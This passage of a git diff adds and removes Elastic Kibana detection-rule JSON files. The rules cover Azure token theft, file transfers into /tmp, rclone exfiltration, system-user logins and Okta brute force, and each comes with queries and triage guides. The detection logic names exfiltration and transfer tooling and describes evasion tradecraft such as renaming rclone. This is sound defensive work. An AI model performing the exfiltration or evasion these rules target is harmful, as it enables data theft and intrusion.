values(azure.signinlogs.properties.app_id),\n Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name),\n Esql.azure_signinlogs_properties_auth_requirement_values = values(azure.signinlogs.properties.authentication_requirement),\n Esql.azure_signinlogs_properties_tenant_id = values(azure.tenant_id),\n Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code),\n Esql.message_values = values(message),\n Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id),\n Esql.source_ip_values = VALUES(source.ip) by azure.signinlogs.properties.session_id, azure.signinlogs.identity\n\n| where Esql.is_interactive >= 2 and Esql.is_non_interactive >= 1 and (Esql.source_ip_count_distinct >= 2 or Esql.user_agent_count_distinct >= 2)\n| keep\n Esql.*,\n azure.signinlogs.properties.session_id,\n azure.signinlogs.identity\n", - "references": [ - "https://learn.microsoft.com/en-us/entra/identity/", - "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/concept-sign-ins", - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/", - "https://www.wiz.io/blog/recent-oauth-attacks-detection-strategies" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_auth_requirement_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_client_app_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_resource_display_name_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_resource_id_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_status_error_code_values", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.azure_signinlogs_properties_tenant_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.count_logon", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.is_interactive", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.is_non_interactive", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.message_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "Esql.source_ip_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.source_ip_values", - "type": "ip" - }, - { - "ecs": false, - "name": "Esql.timestamp_values", - "type": "date" - }, - { - "ecs": false, - "name": "Esql.user_agent_count_distinct", - "type": "long" - }, - { - "ecs": false, - "name": "Esql.user_agent_values", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.identity", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.session_id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080", - "setup": "#### Required Azure Entra Sign-In Logs\nThis rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration.\n", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Domain: Identity", - "Data Source: Azure", - "Data Source: Entra ID", - "Data Source: Entra ID Sign-in", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1528", - "name": "Steal Application Access Token", - "reference": "https://attack.mitre.org/techniques/T1528/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1566", - "name": "Phishing", - "reference": "https://attack.mitre.org/techniques/T1566/", - "subtechnique": [ - { - "id": "T1566.002", - "name": "Spearphishing Link", - "reference": "https://attack.mitre.org/techniques/T1566/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "3db029b3-fbb7-4697-ad07-33cbfd5bd080_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json b/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json deleted file mode 100644 index 3953c0544ac..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3e528511-7316-4a6e-83da-61b5f1c07fd4_3.json +++ /dev/null @@ -1,97 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects the creation of a file in a world-writeable directory through a service that is commonly used for file transfer. This behavior is often associated with lateral movement and can be an indicator of an attacker attempting to move laterally within a network.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file*", - "auditbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Remote File Creation in World Writeable Directory", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Remote File Creation in World Writeable Directory\n\nIn Linux environments, world-writeable directories like `/tmp` and `/var/tmp` are used for temporary file storage, accessible by all users. Adversaries exploit these directories to deposit malicious files via remote services such as SSH or FTP, facilitating lateral movement. The detection rule identifies file creation events in these directories by non-root users using common file transfer services, signaling potential unauthorized activity.\n\n### Possible investigation steps\n\n- Review the file creation event details, focusing on the file path to determine if it matches any known malicious patterns or if it is unusual for the environment.\n- Identify the user associated with the file creation event by examining the user.id field, and verify if this user should have access to the affected directory.\n- Investigate the process responsible for the file creation by analyzing the process.name field to determine if it aligns with expected usage patterns for the user and system.\n- Check the source IP address and connection details related to the file transfer service used (e.g., SSH, FTP) to identify any suspicious or unauthorized access attempts.\n- Correlate the event with other recent activities on the host to identify any patterns of lateral movement or other suspicious behavior.\n- Review historical data for similar file creation events by the same user or process to assess if this is part of a recurring pattern or an isolated incident.\n\n### False positive analysis\n\n- Routine administrative tasks: System administrators often use file transfer services like scp or rsync to move files for legitimate purposes. To reduce false positives, create exceptions for known administrative accounts or specific file paths that are regularly used for maintenance.\n- Automated scripts and cron jobs: Automated processes may create temporary files in world-writeable directories. Identify and whitelist these scripts or jobs by their process names or user accounts to prevent unnecessary alerts.\n- Software updates and installations: Some software updates or installations may temporarily use world-writeable directories. Monitor and document these activities, and consider excluding specific update processes or package managers from the rule.\n- Development and testing environments: Developers may use these directories for testing purposes. Establish a separate monitoring policy for development environments or exclude known developer accounts to minimize false positives.\n- Backup operations: Backup tools might use temporary directories for staging files. Identify these tools and their typical behavior, and create exceptions based on their process names or user IDs.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further lateral movement by the adversary.\n- Terminate any suspicious processes associated with file transfer services (e.g., scp, ssh, ftp) that are not part of legitimate user activity.\n- Remove any unauthorized files created in world-writeable directories such as /tmp, /var/tmp, or /dev/shm to eliminate potential threats.\n- Conduct a thorough review of user accounts and permissions, focusing on non-root users who have recently accessed the system, to identify any unauthorized access.\n- Reset credentials for compromised or potentially compromised accounts to prevent further unauthorized access.\n- Monitor network traffic for unusual patterns or connections to external IP addresses that may indicate ongoing or additional compromise attempts.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems have been affected, ensuring a coordinated response.\n", - "query": "file where host.os.type == \"linux\" and event.action == \"creation\" and\nprocess.name in (\"scp\", \"sshd\", \"ssh\", \"ftp\", \"sftp\", \"vsftpd\", \"sftp-server\", \"rsync\") and\nfile.path like~ (\"/tmp*\", \"/var/tmp*\", \"/dev/shm/*\", \"/home/.*\") and user.id != \"0\"\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "3e528511-7316-4a6e-83da-61b5f1c07fd4", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.004", - "name": "SSH", - "reference": "https://attack.mitre.org/techniques/T1021/004/" - } - ] - }, - { - "id": "T1570", - "name": "Lateral Tool Transfer", - "reference": "https://attack.mitre.org/techniques/T1570/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "3e528511-7316-4a6e-83da-61b5f1c07fd4_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json b/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json new file mode 100644 index 00000000000..88c3e2c92da --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Data Exfiltration via Rclone", + "note": "## Triage and analysis\n\n### Investigating Potential Data Exfiltration via Rclone\n\nRclone is a legitimate file synchronization tool. Threat actors abuse it (often renamed, e.g. to TrendFileSecurityCheck.exe) to exfiltrate data to S3, HTTP endpoints, or other cloud backends, using `copy`/`sync` with `--include` filters and high `--transfers` to move specific file types at scale.\n\n### Possible investigation steps\n\n- Confirm the command line for `copy`/`sync`, cloud backend (e.g. `:s3:`, `:http`), and options like `--include`, `--transfers`, `-P`.\n- If the process name is not `rclone.exe`, compare with `process.pe.original_file_name`; a mismatch indicates a renamed copy used to evade name-based detection.\n- From the command line, identify the source path (e.g. UNC or local) and the remote backend (S3 bucket, HTTP endpoint) as the exfil destination.\n- Review `--include`/`--exclude` and `--max-age`/`--max-size` to understand what data was targeted (documents, CAD, archives, etc.).\n- Correlate with the process executable path (recently dropped?), parent process, and user; look for outbound network to the same backend.\n\n### False positive analysis\n\n- Legitimate backup or sync jobs using rclone from a known path and config may trigger; allowlist by process path or `--config` path for approved rclone usage.\n\n### Response and remediation\n\n- Terminate the rclone process and isolate the host if exfiltration is confirmed.\n- Identify and revoke access to the destination (S3 bucket, API keys, etc.); preserve logs for the exfil session.\n- Determine scope of data exposed and notify stakeholders; rotate credentials and secrets that may have been in exfiltrated paths.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"rclone.exe\" or ?process.pe.original_file_name == \"rclone.exe\") and process.args : (\"copy\", \"sync\") and\n not process.args : (\"--config=?:\\\\Program Files\\\\rclone\\\\config\\\\rclone\\\\rclone.conf\", \"--config=?:\\\\Program Files (x86)\\\\rclone\\\\config\\\\rclone\\\\rclone.conf\") and \n not process.executable : (\"?:\\\\Program Files*\", \"\\\\Device\\\\HarddiskVolume*\\\\Program Files*\")\n", + "references": [ + "https://attack.mitre.org/techniques/T1048/", + "https://rclone.org/commands/rclone_copy/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "reference": "https://attack.mitre.org/techniques/T1048/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "3f4c2b18-9d2e-4b7a-a3c1-8e6d9f2b5c7e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json deleted file mode 100644 index 937b2e0c377..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_4.json +++ /dev/null @@ -1,94 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies the use of built-in tools attackers can use to discover running processes on an endpoint.", - "from": "now-119m", - "index": [ - "logs-endpoint.events.*", - "endgame-*" - ], - "interval": "60m", - "language": "eql", - "license": "Elastic License v2", - "name": "Process Discovery via Built-In Applications", - "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.name in (\n \"ps\", \"pstree\", \"htop\", \"pgrep\"\n) and \nnot process.parent.name in (\"amazon-ssm-agent\", \"snap\")\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "3f4d7734-2151-4481-b394-09d7c6c91f75", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Rule Type: BBR", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1057", - "name": "Process Discovery", - "reference": "https://attack.mitre.org/techniques/T1057/" - }, - { - "id": "T1518", - "name": "Software Discovery", - "reference": "https://attack.mitre.org/techniques/T1518/", - "subtechnique": [ - { - "id": "T1518.001", - "name": "Security Software Discovery", - "reference": "https://attack.mitre.org/techniques/T1518/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 4 - }, - "id": "3f4d7734-2151-4481-b394-09d7c6c91f75_4", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json b/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json deleted file mode 100644 index e7e6971c0fc..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/428e9109-dc13-4ae9-84cb-100464d4c6fa_3.json +++ /dev/null @@ -1,114 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies successful logins by system users that are uncommon to authenticate. These users have `nologin` set by default, and must be modified to allow SSH access. Adversaries may backdoor these users to gain unauthorized access to the system.", - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-system.auth-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Login via Unusual System User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Login via Unusual System User\n\nIn Linux environments, system users typically have restricted login capabilities to prevent unauthorized access. These accounts, often set with `nologin`, are not meant for interactive sessions. Adversaries may exploit these accounts by altering their configurations to enable SSH access, thus bypassing standard security measures. The detection rule identifies successful logins by these uncommon system users, flagging potential unauthorized access attempts for further investigation.\n\n### Possible investigation steps\n\n- Review the login event details to identify the specific system user account involved in the successful login, focusing on the user.name field.\n- Check the system logs for any recent changes to the user account's configuration, particularly modifications that might have enabled SSH access for accounts typically set with nologin.\n- Investigate the source IP address associated with the login event to determine if it is known or suspicious, and assess whether it aligns with expected access patterns.\n- Examine the timeline of events leading up to and following the login to identify any unusual activities or patterns that could indicate malicious behavior.\n- Verify if there are any other successful login attempts from the same source IP or involving other system user accounts, which could suggest a broader compromise.\n- Consult with system administrators to confirm whether any legitimate changes were made to the system user account's login capabilities and document any authorized modifications.\n\n### False positive analysis\n\n- System maintenance tasks may require temporary login access for system users. Verify if the login corresponds with scheduled maintenance and consider excluding these events during known maintenance windows.\n- Automated scripts or services might use system accounts for legitimate purposes. Identify these scripts and whitelist their associated activities to prevent false alerts.\n- Some system users might be configured for specific applications that require login capabilities. Review application requirements and exclude these users if their access is deemed necessary and secure.\n- In environments with custom configurations, certain system users might be intentionally modified for operational needs. Document these changes and adjust the detection rule to exclude these known modifications.\n- Regularly review and update the list of system users in the detection rule to ensure it reflects the current environment and operational requirements, minimizing unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any active sessions associated with the unusual system user accounts identified in the alert to disrupt ongoing unauthorized access.\n- Review and revert any unauthorized changes to the system user accounts, such as modifications to the shell configuration that enabled login capabilities.\n- Conduct a thorough audit of the system for any additional unauthorized changes or backdoors, focusing on SSH configurations and user account settings.\n- Reset passwords and update authentication mechanisms for all system user accounts to prevent further exploitation.\n- Implement additional monitoring and alerting for any future login attempts by system users, ensuring rapid detection and response to similar threats.\n- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network.", - "query": "authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\nuser.name in (\n \"deamon\", \"bin\", \"sys\", \"games\", \"man\", \"lp\", \"mail\", \"news\", \"uucp\", \"proxy\", \"www-data\", \"backup\",\n \"list\", \"irc\", \"gnats\", \"nobody\", \"systemd-timesync\", \"systemd-network\", \"systemd-resolve\", \"messagebus\",\n \"avahi\", \"sshd\", \"dnsmasq\"\n) and event.outcome == \"success\"\n", - "references": [ - "https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/", - "https://x.com/RFGroenewoud/status/1875112050218922010" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.64.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "428e9109-dc13-4ae9-84cb-100464d4c6fa", - "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: System", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.004", - "name": "SSH Authorized Keys", - "reference": "https://attack.mitre.org/techniques/T1098/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/", - "subtechnique": [ - { - "id": "T1564.002", - "name": "Hidden Users", - "reference": "https://attack.mitre.org/techniques/T1564/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "428e9109-dc13-4ae9-84cb-100464d4c6fa_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json deleted file mode 100644 index 6c00f6fca6a..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." - ], - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Okta Brute Force or Password Spraying Attack", - "note": "## Triage and analysis\n\n### Investigating Okta Brute Force or Password Spraying Attack\n\nThis rule alerts when a high number of failed Okta user authentication attempts occur from a single IP address. This could be indicative of a brute force or password spraying attack, where an adversary may attempt to gain unauthorized access to user accounts by guessing the passwords.\n\n#### Possible investigation steps:\n\n- Review the `source.ip` field to identify the IP address from which the high volume of failed login attempts originated.\n- Look into the `event.outcome` field to verify that these are indeed failed authentication attempts.\n- Determine the `user.name` or `user.email` related to these failed login attempts. If the attempts are spread across multiple accounts, it might indicate a password spraying attack.\n- Check the timeline of the events. Are the failed attempts spread out evenly, or are there burst periods, which might indicate an automated tool?\n- Determine the geographical location of the source IP. Is this location consistent with the user's typical login location?\n- Analyze any previous successful logins from this IP. Was this IP previously associated with successful logins?\n\n### False positive analysis:\n\n- A single user or automated process that attempts to authenticate using expired or wrong credentials multiple times may trigger a false positive.\n- Analyze the behavior of the source IP. If the IP is associated with legitimate users or services, it may be a false positive.\n\n### Response and remediation:\n\n- If you identify unauthorized access attempts, consider blocking the source IP at the firewall level.\n- Notify the users who are targeted by the attack. Ask them to change their passwords and ensure they use unique, complex passwords.\n- Enhance monitoring on the affected user accounts for any suspicious activity.\n- If the attack is persistent, consider implementing CAPTCHA or account lockouts after a certain number of failed login attempts.\n- If the attack is persistent, consider implementing multi-factor authentication (MFA) for the affected user accounts.\n- Review and update your security policies based on the findings from the incident.", - "query": "event.dataset:okta.system and event.category:authentication and event.outcome:failure\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "42bf698b-4738-445b-8231-c834ddefd8a0", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Data Source: Okta", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "threshold": { - "field": [ - "source.ip" - ], - "value": 25 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 414 - }, - "id": "42bf698b-4738-445b-8231-c834ddefd8a0_414", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json b/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json new file mode 100644 index 